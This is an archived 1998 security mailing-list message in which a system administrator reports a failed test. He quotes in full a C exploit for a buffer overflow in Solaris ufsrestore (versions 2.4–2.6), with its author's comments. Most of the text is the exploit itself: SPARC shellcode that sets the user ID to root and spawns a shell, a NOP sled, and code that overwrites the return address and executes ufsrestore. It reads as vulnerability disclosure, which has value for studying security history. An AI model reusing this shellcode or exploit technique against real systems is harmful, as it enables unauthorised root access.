No luck on 2.5, 2.5.1 or 2.6 machines here. Matt Glaves System Administrator glavesat_private Old Dominion University http://www.cs.odu.edu/~glaves Computer Science Department On Thu, 11 Jun 1998, John McDonald wrote: > well.. here is the source. :> > > I have not checked it on a patched machine.. guess I stumbled onto a > different hole when playing with ufsrestore. > > humble > > // ufsrestore solaris 2.4, 2.5, 2.5.1, 2.6 exploit > // by humble > // thanks to plaguez for help > > #include <stdio.h> > #include <stdlib.h> > #include <sys/types.h> > #include <unistd.h> > > #define BUF_LENGTH 300 > #define EXTRA 100 > #define STACK_OFFSET -600 > #define SPARC_NOP 0xac15a16e > > // normal shell code cept I added a bunch of sll's and add's > // to get rid of a 2f '/' in there (from the sethi 0xbdcda, %l7) > // I don't know sparc assembly so this might be dumb :P > > // also added code to do seteuid(0); setuid(0); from erik's buffer > // overrun page > > u_char sparc_shellcode[] = > "\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08" > "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" > "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" > "\xae\x10\x2b\xdc\xaf\x2d\xe0\x01\xae\x05\xe0\x01" > "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01" > "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01" > "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x01" > "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x0a" > "\x90\x0b\x80\x0e" > "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" > "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" > "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"; > > u_long get_sp(void) > { > __asm__("mov %sp,%i0 \n"); > } > > void main(int argc, char *argv[]) > { > char buf[BUF_LENGTH + EXTRA + 8]; > long targ_addr; > u_long *long_p; > u_char *char_p; > int i, code_length = strlen(sparc_shellcode),dso=0,a=0; > > if(argc > 1) dso=atoi(argv[1]); > > long_p =(u_long *) buf ; > targ_addr = get_sp() - STACK_OFFSET - dso; > for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) > *long_p++ = SPARC_NOP; > > char_p = (u_char *) long_p; > > for (i = 0; i < code_length; i++) > *char_p++ = sparc_shellcode[i]; > > long_p = (u_long *) char_p; > > for (i = 0; i < EXTRA / sizeof(u_long); i++) > *long_p++ =targ_addr; > > printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", > targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); > printf("hit ctrl-c and then type y\n"); > execl("/usr/lib/fs/ufs/ufsrestore", &buf[4],"if", "-",(char *) 0); > perror("execl failed"); > } >
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:57:46 PDT